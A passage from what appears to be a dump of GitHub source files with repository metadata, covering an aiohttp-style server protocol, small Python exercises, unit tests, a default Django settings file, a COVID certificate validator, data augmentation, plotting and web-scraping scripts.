self._keepalive_handle.cancel()
if self._waiter:
self._waiter.cancel()
# wait for handlers
with suppress(asyncio.CancelledError, asyncio.TimeoutError):
async with ceil_timeout(timeout):
if self._current_request is not None:
self._current_request._cancel(asyncio.CancelledError())
if self._task_handler is not None and not self._task_handler.done():
await self._task_handler
# force-close non-idle handler
if self._task_handler is not None:
self._task_handler.cancel()
if self.transport is not None:
self.transport.close()
self.transport = None
def connection_made(self, transport: asyncio.BaseTransport) -> None:
super().connection_made(transport)
real_transport = cast(asyncio.Transport, transport)
if self._tcp_keepalive:
tcp_keepalive(real_transport)
self._task_handler = self._loop.create_task(self.start())
assert self._manager is not None
self._manager.connection_made(self, real_transport)
def connection_lost(self, exc: Optional[BaseException]) -> None:
if self._manager is None:
return
self._manager.connection_lost(self, exc)
super().connection_lost(exc)
self._manager = None
self._force_close = True
self._request_factory = None
self._request_handler = None
self._request_parser = None
if self._keepalive_handle is not None:
self._keepalive_handle.cancel()
if self._current_request is not None:
if exc is None:
exc = ConnectionResetError("Connection lost")
self._current_request._cancel(exc)
if self._task_handler is not None:
self._task_handler.cancel()
if self._waiter is not None:
self._waiter.cancel()
self._task_handler = None
if self._payload_parser is not None:
self._payload_parser.feed_eof()
self._payload_parser = None
def set_parser(self, parser: Any) -> None:
# Actual type is WebReader
assert self._payload_parser is None
self._payload_parser = parser
if self._message_tail:
self._payload_parser.feed_data(self._message_tail)
self._message_tail = b""
def eof_received(self) -> None:
pass
def data_received(self, data: bytes) -> None:
if self._force_close or self._close:
return
# parse http messages
messages: Sequence[_MsgType]
if self._payload_parser is None and not self._upgrade:
assert self._request_parser is not None
try:
messages, upgraded, tail = self._request_parser.feed_data(data)
except HttpProcessingError as exc:
messages = [
(_ErrInfo(status=400, exc=exc, message=exc.message), EMPTY_PAYLOAD)
]
upgraded = False
tail = b""
for msg, payload in messages or ():
self._request_count += 1
self._messages.append((msg, payload))
waiter = self._waiter
if messages and waiter is not None and not waiter.done():
# don't set result twice
waiter.set_result(None)
self._upgrade = upgraded
if upgraded and tail:
self._message_tail = tail
# no parser, just store
elif self._payload_parser is None and self._upgrade and data:
self._message_tail += data
# feed payload
elif data:
eof, tail = self._payload_parser.feed_data(data)
if eof:
self.close()
def keep_alive(self, val: bool) -> None:
"""Set keep-alive connection mode.
:param bool val: new state.
"""
self._keepalive = val
if self._keepalive_handle:
self._keepalive_handle.cancel()
self._keepalive_handle = None
def close(self) -> None:
"""Close connection.
Stop accepting new pipelining messages and close
connection when handlers done processing messages.
"""
self._close = True
if self._waiter:
self._waiter.cancel()
def force_close(self) -> None:
"""Forcefully close connection."""
self._force_close = True
if self._waiter:
self._waiter.cancel()
if self.transport is not None:
self.transport.close()
self.transport = None
def log_access(
self, request: BaseRequest, response: StreamResponse, time: float
) -> None:
if self.access_logger is not None:
self.access_logger.log(request, response, self._loop.time() - time)
def log_debug(self, *args: Any, **kw: Any) -> None:
if self.debug:
self.logger.debug(*args, **kw)
def log_exception(self, *args: Any, **kw: Any) -> None:
self.logger.exception(*args, **kw)
def _process_keepalive(self) -> None:
if self._force_close or not self._keepalive:
return
next = self._keepalive_time + self._keepalive_timeout
# handler in idle state
if self._waiter:
if self._loop.time() > next:
self.force_close()
return
# not all request handlers are done,
# reschedule itself to next second
self._keepalive_handle = self._loop.call_later(
self.KEEPALIVE_RESCHEDULE_DELAY, self._process_keepalive
)
async def _handle_request(
self,
request: BaseRequest,
start_time: float,
request_handler: Callable[[BaseRequest], Awaitable[StreamResponse]],
) -> Tuple[StreamResponse, bool]:
assert self._request_handler is not None
try:
try:
self._current_request = request
resp = await request_handler(request)
finally:
self._current_request = None
except HTTPException as exc:
resp = exc
reset = await self.finish_response(request, resp, start_time)
except asyncio.CancelledError:
raise
except asyncio.TimeoutError as exc:
self.log_debug("Request handler timed out.", exc_info=exc)
resp = self.handle_error(request, 504)
reset = await self.finish_response(request, resp, start_time)
except Exception as exc:
resp = self.handle_error(request, 500, exc)
reset = await self.finish_response(request, resp, start_time)
else:
# Deprecation warning (See #2415)
if getattr(resp, "__http_exception__", False):
warnings.warn(
"returning HTTPException object is deprecated "
"(#2415) and will be removed, "
"please raise the exception instead",
DeprecationWarning,
)
reset = await self.finish_response(request, resp, start_time)
return resp, reset
async def start(self) -> None:
"""Process incoming request.
It reads request line, request headers and request payload, then
calls handle_request() method. Subclass has to override
handle_request(). start() handles various exceptions in request
or response handling. Connection is being closed always unless
keep_alive(True) specified.
"""
loop = self._loop
handler = self._task_handler
assert handler is not None
manager = self._manager
assert manager is not None
keepalive_timeout = self._keepalive_timeout
resp = None
assert self._request_factory is not None
assert self._request_handler is not None
while not self._force_close:
if not self._messages:
try:
# wait for next request
self._waiter = loop.create_future()
await self._waiter
except asyncio.CancelledError:
break
finally:
self._waiter = None
message, payload = self._messages.popleft()
start = loop.time()
manager.requests_count += 1
writer = StreamWriter(self, loop)
if isinstance(message, _ErrInfo):
# make request_factory work
request_handler = self._make_error_handler(message)
message = ERROR
else:
request_handler = self._request_handler
request = self._request_factory(message, payload, self, writer, handler)
try:
# a new task is used for copy context vars (#3406)
task = self._loop.create_task(
self._handle_request(request, start, request_handler)
)
try:
resp, reset = await task
except (asyncio.CancelledError, ConnectionError):
self.log_debug("Ignored premature client disconnection")
break
# Drop the processed task from asyncio.Task.all_tasks() early
del task
if reset:
self.log_debug("Ignored premature client disconnection 2")
break
# notify server about keep-alive
self._keepalive = bool(resp.keep_alive)
# check payload
if not payload.is_eof():
lingering_time = self._lingering_time
if not self._force_close and lingering_time:
self.log_debug(
"Start lingering close timer for %s sec.", lingering_time
)
now = loop.time()
end_t = now + lingering_time
with suppress(asyncio.TimeoutError, asyncio.CancelledError):
while not payload.is_eof() and now < end_t:
async with ceil_timeout(end_t - now):
# read and ignore
await payload.readany()
now = loop.time()
# if payload still uncompleted
if not payload.is_eof() and not self._force_close:
self.log_debug("Uncompleted request.")
self.close()
payload.set_exception(PayloadAccessError())
except asyncio.CancelledError:
self.log_debug("Ignored premature client disconnection ")
break
except RuntimeError as exc:
if self.debug:
self.log_exception("Unhandled runtime exception", exc_info=exc)
self.force_close()
except Exception as exc:
self.log_exception("Unhandled exception", exc_info=exc)
self.force_close()
finally:
if self.transport is None and resp is not None:
self.log_debug("Ignored premature client disconnection.")
elif not self._force_close:
if self._keepalive and not self._close:
# start keep-alive timer
if keepalive_timeout is not None:
now = self._loop.time()
self._keepalive_time = now
if self._keepalive_handle is None:
self._keepalive_handle = loop.call_at(
now + keepalive_timeout, self._process_keepalive
)
else:
break
# remove handler, close transport if no handlers left
if not self._force_close:
self._task_handler = None
if self.transport is not None:
self.transport.close()
async def finish_response(
self, request: BaseRequest, resp: StreamResponse, start_time: float
) -> bool:
"""Prepare the response and write_eof, then log access.
This has to
be called within the context of any exception so the access logger
can get exception information. Returns True if the client disconnects
prematurely.
"""
if self._request_parser is not None:
self._request_parser.set_upgraded(False)
self._upgrade = False
if self._message_tail:
self._request_parser.feed_data(self._message_tail)
self._message_tail = b""
try:
prepare_meth = resp.prepare
except AttributeError:
if resp is None:
raise RuntimeError("Missing return " "statement on request handler")
else:
raise RuntimeError(
"Web-handler should return "
"a response instance, "
"got {!r}".format(resp)
)
try:
await prepare_meth(request)
await resp.write_eof()
except ConnectionError:
self.log_access(request, resp, start_time)
return True
else:
self.log_access(request, resp, start_time)
return False
def handle_error(
self,
request: BaseRequest,
status: int = 500,
exc: Optional[BaseException] = None,
message: Optional[str] = None,
) -> StreamResponse:
"""Handle errors.
Returns HTTP response with specific status code. Logs additional
information. It always closes current connection.
"""
self.log_exception("Error handling request", exc_info=exc)
# some data already got sent, connection is broken
if request.writer.output_size > 0:
raise ConnectionError(
"Response is sent already, cannot send another response "
"with the error message"
)
ct = "text/plain"
if status == HTTPStatus.INTERNAL_SERVER_ERROR:
title = "{0.value} {0.phrase}".format(HTTPStatus.INTERNAL_SERVER_ERROR)
msg = HTTPStatus.INTERNAL_SERVER_ERROR.description
tb = None
if self.debug:
with suppress(Exception):
tb = traceback.format_exc()
if "text/html" in request.headers.get("Accept", ""):
if tb:
tb = html_escape(tb)
msg = f"<h2>Traceback:</h2>\n<pre>{tb}</pre>"
message = (
"<html><head>"
"<title>{title}</title>"
"</head><body>\n<h1>{title}</h1>"
"\n{msg}\n</body></html>\n"
).format(title=title, msg=msg)
ct = "text/html"
else:
if tb:
msg = tb
message = title + "\n\n" + msg
resp = Response(status=status, text=message, content_type=ct)
resp.force_close()
return resp
def _make_error_handler(
self, err_info: _ErrInfo
) -> Callable[[BaseRequest], Awaitable[StreamResponse]]:
async def handler(request: BaseRequest) -> StreamResponse:
return self.handle_error(
request, err_info.status, err_info.exc, err_info.message
)
return handler
|
[
"noreply@github.com"
] |
zdar.noreply@github.com
|
3abdf84cc22cefb42af6f5fd17b8ededadeb3779
|
fc070dfc9182b7f3a923e2b22331112c01bc8970
|
/21-30/30.py
|
66dd4eb1d8af8f9ebfcc9ced98c6c30be7ad3c02
|
[] |
no_license
|
sucman/Python100
|
346ddd11e4387ef3fac14f9180c1607bf4573afc
|
6453455f9029cb86953fc70f5bcf5a8d84489673
|
refs/heads/master
| 2020-05-04T15:29:00.617638
| 2019-04-03T08:37:43
| 2019-04-03T08:37:59
| 179,242,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
# -*- coding:utf-8 -*-
'''
一个5位数,判断它是不是回文数。即12321是回文数,个位与万位相同,十位与千位相同。
'''
a = int(raw_input("请输入数字:"))
x = str(a)
flag = True
for i in range(len(x) / 2):
if x[i] != x[-i - 1]:
flag = False
break
if flag:
print "%d 是一个回文数。" % a
else:
print "%d 不是回文数。" % a
|
[
"https://github.com/sucman/AppiumTest.git"
] |
https://github.com/sucman/AppiumTest.git
|
3f0b3d42f816e833e4bab099a8f4bf1c4dd007e3
|
3c7057226c7bb01cd493cde5742b3979cf030f94
|
/tests/unit/client/test_auth_tracker.py
|
9857bf2e6d080b102db25cb8cb9a8c3ab9e75097
|
[
"Apache-2.0"
] |
permissive
|
sharadc2001/lmctl
|
2d047f776d1bbee811801ccc5454a097b1484841
|
a220a3abeef5fc1f7c0a9410524625c2ff895a0a
|
refs/heads/master
| 2023-05-27T06:14:49.425793
| 2021-04-29T20:08:52
| 2021-04-29T20:08:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,084
|
py
|
import unittest
import time
from lmctl.client.auth_tracker import AuthTracker
class TestAuthTracker(unittest.TestCase):
def test_accept_auth_response(self):
tracker = AuthTracker()
tracker.accept_auth_response({
'accessToken': '123',
'expiresIn': 60,
})
self.assertEqual(tracker.current_access_token,'123')
self.assertIsNotNone(tracker.time_of_auth)
def test_has_access_expired_when_no_token(self):
tracker = AuthTracker()
self.assertTrue(tracker.has_access_expired)
def test_has_access_expired(self):
tracker = AuthTracker()
tracker.accept_auth_response({
'accessToken': '123',
'expiresIn': 0.2,
})
time.sleep(0.3)
self.assertTrue(tracker.has_access_expired)
def test_has_access_expired_false_when_time_not_passed(self):
tracker = AuthTracker()
tracker.accept_auth_response({
'accessToken': '123',
'expiresIn': 25,
})
self.assertFalse(tracker.has_access_expired)
|
[
"daniel.vaccaro-senna@ibm.com"
] |
daniel.vaccaro-senna@ibm.com
|
79021698e963ef29669a46525cd80edf60c44917
|
afdcdaabecd85a2f237a40c57e52c5b2651ee4ac
|
/textutils/settings.py
|
63d106afb62d18c3734b0ac6d4372bbe35795c05
|
[] |
no_license
|
amit631308/TextUtils
|
4ec99b4763ca06c2a921df8aec6c8d593ed523bf
|
d4c3f788de73c95f226299f1a881ebab2eb905be
|
refs/heads/master
| 2020-12-12T12:43:36.792812
| 2020-01-15T17:16:56
| 2020-01-15T17:16:56
| 234,129,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,106
|
py
|
"""
Django settings for textutils project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'q!s4w07oj9%id!60pefllb47a-f1homsb_$fk%##_0zu^ak(fc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'textutils.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'textutils.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"you@example.com"
] |
you@example.com
|
4853d7a33e778004d0fcfc54df63a2f2c44f64de
|
2ac6af36f5412d3407a8bea8abee91e866559df3
|
/python/most_digits.py
|
8281e1a35b15bddc854093e3001046f7eb7b17a1
|
[] |
no_license
|
fzramos/brainteasers
|
128a6bfe26dd359135576cc838aa178f5f74bc3f
|
c7a2a3b440e6cd9eb7271dccee30af2fd51a1044
|
refs/heads/master
| 2023-03-31T04:00:11.701374
| 2021-04-02T17:17:01
| 2021-04-02T17:17:01
| 331,523,790
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 417
|
py
|
"""
Find the number with the most digits.
If two numbers in the argument array have the same number of digits, return the first one in the array.
"""
# quick first attempt
def find_longest(arr):
strs = list(map(str, arr))
# without key max would see string 4 as greater than string 1000
return int(max(strs, key = len))
def find_longest_best(arr):
return max(arr, key=lambda x: len(str(x)))
|
[
"64625115+fzramos@users.noreply.github.com"
] |
64625115+fzramos@users.noreply.github.com
|
200c79377301477c6cc35c49fbf5ab5eecc2f49c
|
8e35a152a91fe484eb971c597964132b968bf0f7
|
/validate_hcert.py
|
bf7ed9eb2df1797832a0e29eaa08fc35e80a6cfe
|
[] |
no_license
|
Totoro2205/eu-dcc-diagnostics
|
540354e1157e5c5ece1b226dfa5a39a30cdafafa
|
0b82b043689ab7ada82072d3221cf123237ba3c9
|
refs/heads/master
| 2023-09-01T16:06:37.392438
| 2021-10-27T15:02:46
| 2021-10-27T15:02:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,931
|
py
|
#!/bin/env python3.9
import sys
from base45 import b45decode
import zlib
from cbor2 import loads
from cose.messages import Sign1Message
from classes.SchemaValidator import SchemaValidator
from classes.SignatureValidator import SignatureValidator
from classes.TrustList import TrustList, UnknownKidError
# Initialize components
SCHEMA_VALIDATOR = SchemaValidator.create()
SIGNATURE_VALIDATOR = SignatureValidator(TrustList.load("trustlist.json"))
sys.stdin.reconfigure(encoding='utf-8')
def unpack_qr(qr_text):
compressed_bytes = b45decode(qr_text[4:])
print("..b45-decode OK")
cose_bytes = zlib.decompress(compressed_bytes)
print("..zlib.decompress OK")
cose_message = Sign1Message.decode(cose_bytes)
print("..cose.decode OK")
cbor_message = loads(cose_message.payload)
print("..cbor.load OK")
print(cbor_message)
return {
"COSE": cose_bytes.hex(),
"JSON": cbor_message[-260][1]
}
for line in sys.stdin:
data = line.rstrip("\r\n").rstrip("\n")
print()
print(f"Validating: [{data}]")
try:
json = unpack_qr(data)
# Signature
result = SIGNATURE_VALIDATOR.validate(bytes.fromhex(json["COSE"]))
if result["valid"]:
print("Successfully validated signature!")
else:
print("Signature validation failed!")
# Schema
json_payload = json["JSON"]
schema_ver = json_payload['ver']
result = SCHEMA_VALIDATOR.validate(json_payload)
if result["valid"]:
print(f"Successfully validated schema! The file conforms to schema { schema_ver }")
else:
print(f"Schema validation failed! The file does not conform to schema { schema_ver }")
except UnknownKidError as error:
print("Error! KID not found")
print(error)
except Exception as error:
print("Error! Something went very wrong!")
print(error)
|
[
"ryan@seldonplan.com"
] |
ryan@seldonplan.com
|
10cb9613d04d8eda241c65c5cdd1b61e4190ce71
|
ac853361fa5faed26a9725d2b76c5e6ed5b83a9f
|
/ppd_rank1/data_aug.py
|
3ab199878e8237706d194911966cbc138f8fb750
|
[] |
no_license
|
jnuCompetition/chip2018
|
1637483fcf116157c08fca691639b0b277c1c1d6
|
0621a391a8eead6251bb8adc610a7905ba6c20cd
|
refs/heads/master
| 2020-04-08T16:00:25.102851
| 2018-11-28T12:23:24
| 2018-11-28T12:23:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,443
|
py
|
#/usr/bin/env python
#coding=utf-8
import sys,math
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split, StratifiedKFold
clusterindex = 0
questionindex = {}
clusterindexsim = {}
clusterinfo = {}
questionfalse = {}
count = 0
limit = 2000000
for line in open('../input/train.csv'):
if not line:
continue
array = line.strip().split(',')
if array[0] == 'label':
continue
if count < limit:
if questionindex.get(array[1],-1)==-1:
questionindex[array[1]] = clusterindex
clusterinfo[clusterindex] = clusterinfo.get(clusterindex,[])
clusterinfo[clusterindex].append(array[1])
clusterindex += 1
if questionindex.get(array[2],-1)==-1:
if array[0] == '1':
questionindex[array[2]] = questionindex[array[1]]
clusterinfo[questionindex[array[1]]].append(array[2])
else:
questionindex[array[2]] = clusterindex
clusterinfo[clusterindex] = clusterinfo.get(clusterindex, [])
clusterinfo[clusterindex].append(array[2])
clusterindex += 1
if array[0] == '0':
assert questionindex[array[2]] != questionindex[array[1]]
else:
if questionindex[array[2]] != questionindex[array[1]]:
clusterindexsim[questionindex[array[2]]] = clusterindexsim.get(questionindex[array[2]],[])
clusterindexsim[questionindex[array[2]]].append(questionindex[array[1]])
clusterindexsim[questionindex[array[1]]] = clusterindexsim.get(questionindex[array[1]], [])
clusterindexsim[questionindex[array[1]]].append(questionindex[array[2]])
count+=1
f = open('../input/questionclusterdebug','w')
# f = open('./debug','w')
index2 = set()
count = 0
questionindex = {}
clusterinfo2 = {}
for k,v in clusterinfo.items():
ids = set()
res = set()
index1 = set([k])
while len(index1 - index2) > 0:
temp = set()
for k2 in index1 - index2:
ids.add(k2)
index2.add(k2)
res = res | set(clusterinfo[k2])
# for k3 in clusterindexsim.get(k2,[]):
temp = temp | set(clusterindexsim.get(k2,[]))
index1 = index1 | temp
if len(res) > 0:
# print >> f,str(count) + "|" + ",".join(list(res))
print(str(count) + "|" + ",".join(list(res)),file=f)
clusterinfo2[count] = ",".join(list(res))
for question in res:
questionindex[question] = count
count += 1
# print s
count = 0
clusternotconnect = {}
pairsintrain = set()
for line in open('../input/train.csv'):
if not line:
continue
array = line.strip().split(',')
if array[0] == 'label':
continue
if count < limit:
if array[0] == '0':
clusternotconnect[questionindex[array[2]]] = clusternotconnect.get(questionindex[array[2]],set())
clusternotconnect[questionindex[array[2]]].add(questionindex[array[1]])
clusternotconnect[questionindex[array[1]]] = clusternotconnect.get(questionindex[array[1]],set())
clusternotconnect[questionindex[array[1]]].add(questionindex[array[2]])
pairsintrain.add(array[1] + array[2])
pairsintrain.add(array[2] + array[1])
count += 1
f = open('../input/questioncluster','w')
for k,v in clusterinfo2.items():
# print >> f, str(k) + "|" + v + "|" + ",".join(map(str, list(clusternotconnect.get(k,set())))) # clusterid|questions|sameid|falseid
print(str(k) + "|" + v + "|" + ",".join(map(str, list(clusternotconnect.get(k,set())))),f)
f.close()
import random
import itertools
clusterindexlist = []
questionindex = {}
clusterinfo = {}
allquestion = set()
clusternotconnect = {}
count = 0
for line in open('../input/questioncluster'):
if not line:
continue
array = line.strip().split('|')
id = array[0]
questions = array[1].split(',')
clusterinfo[id] = questions
clusterindexlist.append(id)
for question in questions:
allquestion.add(question)
questionindex[question] = id
clusternotconnect[id] = array[2].split(',')
questioncountpos = {}
questioncountneg = {}
countt = 0
countf = 0
print(len(allquestion))
# print(len(filter(lambda x:len(x[1]) > 2,clusterinfo.items())))
f2 = open('../input/train_remix.csv','w')
# print >>f2,"label,q1,q2"
print("label,q1,q2",file=f2)
for id,l in clusterinfo.items():
limit = 0
res = []
if len(l) > 2:
otherquestion = list(allquestion - set(l))
comb = [w for w in itertools.combinations(l, 2)]
limit = min(int(len(l) * 8),max(1,len(l) * (len(l) - 1) / 3))
res = random.sample(comb, min(limit+10,max(1,len(l) * (len(l) - 1) / 3)))
count = 0
for k in res:
if k[0] + k[1] not in pairsintrain:
# print >> f2, "1," + k[0] + "," + k[1]
print("1," + k[0] + "," + k[1],file=f2)
count += 1
countt += 1
# else:
# continue
if random.random() > 0.4:
q1 = k[0]
q2 = random.sample(otherquestion,1)
if q2[0] + q1 not in pairsintrain:
# print >> f2, "0," + q2[0] + "," + q1
print("0," + q2[0] + "," + q1,file=f2)
countf+=1
if random.random() > 0.4:
q1 = k[1]
q2 = random.sample(otherquestion,1)
if q1 + q2[0] not in pairsintrain:
# print >> f2, "0," + q1 + "," + q2[0]
print("0," + q1 + "," + q2[0], file=f2)
countf+=1
if count == limit:
break
print(countt,countf)
f2.close()
f = open('../input/test_fix.csv', 'w')
# print >> f, "q1,q2,oldindex"
print("q1,q2,oldindex",file=f)
count = 0
singlecount = 0
twocount = 0
fixcount = 0
for line in open('../input/test.csv'):
if not line:
continue
array = line.strip().split(',')
if array[0] == 'q1':
continue
# label = array[0]
q2 = array[1]
q1 = array[0]
q1l = []
q2l = []
if questionindex.get(q1,-1) != -1:
q1l = random.sample(clusterinfo[questionindex[q1]],min(len(clusterinfo[questionindex[q1]]),10))
if questionindex.get(q2,-1) != -1:
q2l = random.sample(clusterinfo[questionindex[q2]],min(len(clusterinfo[questionindex[q2]]),10))
if len(q1l) <= 1:
singlecount += 1
if len(q2l) <= 1:
singlecount += 1
q1l = set(q1l) - set([q1])
q2l = set(q2l) - set([q2])
# print >>f, q1 + ',' + q2 + "," + str(count)
print(q1 + ',' + q2 + "," + str(count),file=f)
for k2 in random.sample(q2l,min(len(q2l),10)):
if random.random() > 0.5:
# print >>f, q1 + ',' + k2 + "," + str(count)
print(q1 + ',' + k2 + "," + str(count), file=f)
else:
# print >> f,k2 + ',' + q1 + "," + str(count)
print(k2 + ',' + q1 + "," + str(count), file=f)
for k1 in random.sample(q1l,min(len(q1l),10)):
if random.random() > 0.5:
# print >>f, k1 + ',' + q2 + "," + str(count)
print(k1 + ',' + q2 + "," + str(count),file=f)
else:
# print >>f, q2 + ',' + k1 + "," + str(count)
print(q2 + ',' + k1 + "," + str(count), file=f)
count += 1
|
[
"zhaoyuansir@163.com"
] |
zhaoyuansir@163.com
|
55a530839c8082968273f2a09b8b4ddf21380663
|
646a5080f2e4ae87c90978282844a9b314367088
|
/camera_ws/catkin_ws/build/image_pipeline/camera_calibration/catkin_generated/pkg.develspace.context.pc.py
|
2cdfae278109b18e1b22d4a786fc4a2f4610699a
|
[] |
no_license
|
0000duck/METR4202-T6
|
eb72a064fafc13b11c833a25802fb9c74472d010
|
fa7ef8e9a2e443a18df9ab214619b5458b9edd67
|
refs/heads/main
| 2023-08-16T07:24:26.877881
| 2021-10-25T04:09:29
| 2021-10-25T04:09:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 404
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "camera_calibration"
PROJECT_SPACE_DIR = "/home/michael/METR4202-T6/camera_ws/catkin_ws/devel"
PROJECT_VERSION = "1.15.3"
|
[
"m.leonard@uqconnect.edu.au"
] |
m.leonard@uqconnect.edu.au
|
400b4e2d59da265875e51847c2fd51ad8e9da2ea
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_200/4699.py
|
47f6b945465c705d69be01ee6ea4d93ff6faac1f
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 838
|
py
|
# input() reads a string with a line of input, stripping the '\n' (newline) at the end.
# This is all you need for most Google Code Jam problems.
t = int(input()) # read a line with a single integer
for i in range(1, t + 1):
number = [int(s) for s in input()]
adjust = 0
final = 0
same = 0
output = ""
for j in range(0, len(number)-1):
if number[j] > number[j+1]:
adjust = len(number)- 1 - j + same
break
elif number[j] == number[j+1]:
same += 1
for integer in number:
output += str(integer)
if (adjust > 0):
adjustment = "1"
for k in range(adjust):
adjustment += "0"
final = int(output) - int(output) % int(adjustment) - 1
output = final
print("Case #{}: {}".format(i, int(output)))
# check out .format's specification for more formatting options
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
4a9d85d73d161d461258a8b08813d81d310c6bba
|
242d50e9daeee73653e0e553679a61f3e984a303
|
/plots/python/cutsJet1.py
|
7f0eb9af5ec549ee7193ac746e4f49528a5ca1c9
|
[] |
no_license
|
HephyAnalysisSW/TTGammaEFT
|
72cf63d20097daa37ffd008904d75a78fa009162
|
bbedb106154bab510289a3833ec39949c5e4b005
|
refs/heads/master
| 2021-11-28T09:44:56.093647
| 2021-10-22T08:45:14
| 2021-10-22T08:45:14
| 157,550,390
| 0
| 2
| null | 2020-07-02T06:29:45
| 2018-11-14T13:08:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,096
|
py
|
#!/usr/bin/env python
''' Define list of plots for plot script
'''
# Standard Imports
from math import pi
# RootTools
from RootTools.core.standard import *
# plotList
cutsJet1 = []
cutsJet1.append( Plot(
name = 'jet1_neHEF',
texX = 'neHEF(jet_{1})',
texY = 'Number of Events',
attribute = lambda event, sample: event.Jet_neHEF[1],
binning = [ 30, 0., 1 ],
))
cutsJet1.append( Plot(
name = 'jet1_neEmEF',
texX = 'neEmEF(jet_{1})',
texY = 'Number of Events',
attribute = lambda event, sample: event.Jet_neEmEF[1],
binning = [ 30, 0., 1 ],
))
cutsJet1.append( Plot(
name = 'jet1_chEmHEF',
texX = 'chEmEF(jet_{1})',
texY = 'Number of Events',
attribute = lambda event, sample: event.Jet_chEmEF[1],
binning = [ 30, 0., 1 ],
))
cutsJet1.append( Plot(
name = 'jet1_chHEF',
texX = 'chHEF(jet_{1})',
texY = 'Number of Events',
attribute = lambda event, sample: event.Jet_chHEF[1],
binning = [ 30, 0, 1 ],
))
|
[
"lukas.k.lechner@gmail.com"
] |
lukas.k.lechner@gmail.com
|
be67f68208b753fa387e260cf954c5e941ff7844
|
f4d0f1357530a5889fcbf51bb9b9c5abe86afe9d
|
/scrapy.py
|
d9f70ec729a40a626b82037faba5e91e5bc228b9
|
[] |
no_license
|
marcelosantos/python-web-scraping
|
fd25e7372dbb1ad77aa537e6111eba99c9d363cb
|
0c7c6c837903de1a1910280661635daf8579d1bf
|
refs/heads/master
| 2021-01-01T18:28:37.730372
| 2017-01-06T19:30:44
| 2017-01-06T19:30:44
| 78,232,730
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 586
|
py
|
import requests
from bs4 import BeautifulSoup
url = 'http://www.blog.pythonlibrary.org/'
def get_articles():
""" Get the articles from the front page of the blog """
req = requests.get(url)
html = req.text
soup = BeautifulSoup(html, 'html.parser')
pages = soup.findAll('h1')
articles = {i.a['href']: i.text.strip()
for i in pages if i.a}
for article in articles:
s = '{title}: {url}'.format(title=articles[article], url=article)
print(s)
return articles
if __name__ == '__main__':
articles = get_articles()
|
[
"marcelosantosadm@gmail.com"
] |
marcelosantosadm@gmail.com
|
02ff9203e38764ba63dffd72edcc3d9bcc88c667
|
83de24182a7af33c43ee340b57755e73275149ae
|
/aliyun-python-sdk-ecd/aliyunsdkecd/request/v20200930/ApproveFotaUpdateRequest.py
|
9aa68198a829fe25048d4a1eeb00483f8e626999
|
[
"Apache-2.0"
] |
permissive
|
